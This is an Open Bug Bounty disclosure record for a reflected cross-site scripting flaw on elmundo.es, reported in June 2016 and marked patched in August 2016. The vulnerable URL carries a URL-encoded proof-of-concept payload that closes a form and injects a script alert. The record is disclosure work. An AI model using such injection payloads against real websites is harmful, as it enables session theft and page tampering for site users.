elmundo.es XSS vulnerability

2016-06-21T15:46:00
ID OBB:160543
Type openbugbounty
Reporter XSSbot
Modified 2016-08-25T03:04:00

Description

Vulnerable URL:
http://www.elmundo.es/loterias/loteria-navidad.html?auth_token=%5B%27136ebd48bbd33f55cc45c0a685d56ec7%27%5D&importe;=%5B%27%27%5D&Buscar;=%5B%27Buscar%27%5D&nlot;=%5B%27%27%5D%22%27%3E%20%3C/form%3E%3Cscript%3Ealert(%22OPENBUGBOUNTY%22);%3C/script%3E
Details:

Description| Value
---|---
Patched:| Yes, at 24.08.2016
Latest check for patch:| 24.08.2016 10:50 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 624
VIP website status:| Yes
Check elmundo.es SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 June, 2016 15:46 GMT
Generic security notifications sent to website owner| 21 June, 2016 15:48 GMT
Notification sent to subscribers (without technical details)| 21 June, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 28 June, 2016 16:12 GMT
Vulnerability patched by the website owner| 25 August, 2016 03:04 GMT